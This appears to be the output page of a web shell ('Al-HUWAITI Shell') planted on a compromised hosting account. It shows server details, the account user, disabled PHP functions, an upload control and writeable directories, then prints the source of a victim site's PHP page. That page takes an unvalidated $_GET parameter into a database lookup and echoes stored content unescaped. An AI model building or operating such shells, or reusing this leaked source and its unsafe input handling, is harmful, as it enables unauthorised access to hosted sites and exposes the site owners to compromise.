Al-HUWAITI Shell
Al-huwaiti


Server : Apache
System : Linux server.xvl.jdw.mybluehostin.me 5.14.0-611.42.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Mar 24 05:30:20 EDT 2026 x86_64
User : pigugusurya ( 1113)
PHP Version : 8.2.30
Disable Function : exec,passthru,shell_exec,system
Directory :  /home/pigugusurya/public_html/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/pigugusurya/public_html/page - Copy.php
<!doctype html>
<!--[if lt IE 7]>		<html class="no-js lt-ie9 lt-ie8 lt-ie7" lang=""> <![endif]-->
<!--[if IE 7]>			<html class="no-js lt-ie9 lt-ie8" lang=""> <![endif]-->
<!--[if IE 8]>			<html class="no-js lt-ie9" lang=""> <![endif]-->
<!--[if gt IE 8]><!-->
<?php 
include("config.php"); 

$service = $_GET['service'];
$info = $db->selectRow('support_services', '*', array('id'=>$service));

?>

<html class="no-js" lang="zxx"> <!--<![endif]-->

<head>
	<meta charset="utf-8">
	<meta http-equiv="X-UA-Compatible" content="IE=edge">
	<title><?php echo $settings->name; ?></title>
	<meta name="description" content="">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<link rel="apple-touch-icon" href="apple-touch-icon.html">
	<link rel="stylesheet" href="css/bootstrap.min.css">
	<link rel="stylesheet" href="css/normalize.css">
	<link rel="stylesheet" href="css/font-awesome.min.css">
	<link rel="stylesheet" href="css/icomoon.css">
	<link rel="stylesheet" href="css/animate.css">
	<link rel="stylesheet" href="css/transitions.css">
	<link rel="stylesheet" href="css/main.css">
	<link rel="stylesheet" href="css/owl.carousel.css">
	<link rel="stylesheet" href="css/owl.theme.default.css">
	<link rel="stylesheet" href="css/color.css">
	<link rel="stylesheet" href="css/responsive.css">
	<link rel="stylesheet" href="css/tab-pages.css">
    <link rel="stylesheet" href="css/jquery.bxslider.html" type="text/css" />
	<script src="js/vendor/modernizr-2.8.3-respond-1.4.2.min.js"></script>

	<!--calender-->
<style>
th { background : #F86405; color:#fff;}
.tg-relateddocuments li::before {
	content: "\f1c1";
	position: absolute;
	font: normal normal normal 14px/1 FontAwesome;
	left: 0;
	right: 0;
	padding: 12px 0;
	background-color: #fff;
	border-radius: 50px;
	width: 40px;
	height: 40px;
	color: #000;
	text-align: center;
	top: 5px;
	z-index: 9;
	margin: 0 0 0 10px;
}
.tg-relateddocuments li a {
	padding: 0 50px;
	font-weight: 400;
	font-size: 14px;
	color: #666;
}

.tg-relateddocuments li a::after {
	color: #666;
	position: absolute;
	right: 0;
	background-color: ccc;
	content: "\e9bc";
	font-family: 'icomoon' !important;
	width: 60px;
	height: 50px;
	background-color: rgba(0, 0, 0, 0.10);
	font-size: 20px;
	text-align: center;
	line-height: 25px;
	top: 0;
	padding: 10px 0;
}
.tg-relateddocuments li:hover a {
	color: #fff;
}

.tg-relateddocuments li:hover a::after   {
	color: #fff;
}
</style>
</head>

<body class="tg-home tg-homefour">
	<!--[if lt IE 8]>
		<p class="browserupgrade">You are using an <strong>outdated</strong> browser. Please <a href="http://browsehappy.com/">upgrade your browser</a> to improve your experience.</p>
	<![endif]-->
	<!--************************************
			Wrapper Start
	*************************************-->
	<div id="tg-wrapper" class="tg-wrapper">
		<?php include("includes/header.php"); ?>

		
        <main id="tg-main" class="tg-main tg-haslayout">
        
        	<section class="inner-header divider layer-overlay overlay-theme-colored-7" data-bg-img="images/bg1.jpg" style="background-image: url(images/bg1.jpg);">
      			<div class="container pt-60 pb-60">
        		<!-- Section Content -->
        			<div class="section-content">
						<div class="row"> 
							<div class="col-md-12 text-center">
							    <h2 class="page-title"><?php echo $page_info->title; ?></h2>
							    <ul class="inner-headnav">
							        <li><a class="" href="index.php">Home</a></li>
							        <li><?php echo $page_info->title; ?></li>
							    </ul>
							</div>
						</div>
        			</div>
      			</div>
    		</section>  
			<section class="innerpages clearfix">
			        
			    <div class="container">
			    	<div class="row">

			    		<div id="tg-twocolumns" class="tg-twocolumns">
						
					<div id="othersubjects" class="col-xs-12 col-sm-4 col-md-3 col-lg-3 no-pad">
			    								    						<?php include("includes/left-menu.php"); ?>
			    												</div>     
			    			<div class="col-xs-12 col-sm-8 col-md-9 col-lg-9 no-pad">                
								<div class="container-fluid">


								 <div id="tg-content" class="tg-content">	
								 	
								 <h3 class="page-title"> <?php echo $page_info->title; ?></h3>
                  <hr id="line">
				  <?php echo $info->content; ?>
					                      
										  <?php if(!empty($info->activities)){ ?>
											<h5 style='color:#800000;'> Activities</h5>
											<?php 
											echo '<p>'.$info->activities.'</p>'; 
											}
											?>					                      
													  
										  <?php if(!empty($info->achievements)){ ?>
											<h5 style='color:#800000;'> Achievements</h5>
											<?php 
											echo '<p>'.$info->achievements.'</p>'; 
											}
											?>	
													  
										  <?php if(!empty($info->gallery)){ ?>
											<h5 style='color:#800000;'> Gallery</h5>
											<?php 
											echo '<p>'.$info->gallery.'</p>'; 
											}
											?>	
										   
													  <?php echo $info->content2; ?>
													  <?php echo $info->content3; ?>
													  <?php echo $info->content4; ?>
								</div>
								</div>						

							</div>  
			    				
			    			                 

			    		</div>
			    
			    	</div>
			    </div>
			</section>

        </main>

		<?php include("includes/footer.php"); ?>
	</div>
    </div>
	<!--************************************
			Wrapper End
	*************************************-->
	<script src="js/vendor/jquery-library.js"></script>
	<script src="js/vendor/bootstrap.min.js"></script>
    <script src="js/owl.carousel.min.js"></script>
	<script src="js/isotope.pkgd.js"></script>
	<script src="js/prettyPhoto.js"></script>
    <script src="js/jquery.bxslider.js"></script>
	<script src="js/countdown.js"></script>
	<script src="js/collapse.js"></script>
	<script src="js/moment.js"></script>
	<script src="js/main.js"></script>
<script>
$(function(){
$('.bxslider').bxSlider({
minSlides: 1,
maxSlides:1,
slideWidth: 747,
slideMargin: 0
});
});
  
</script>

</body>


</html>

Al-HUWAITI Shell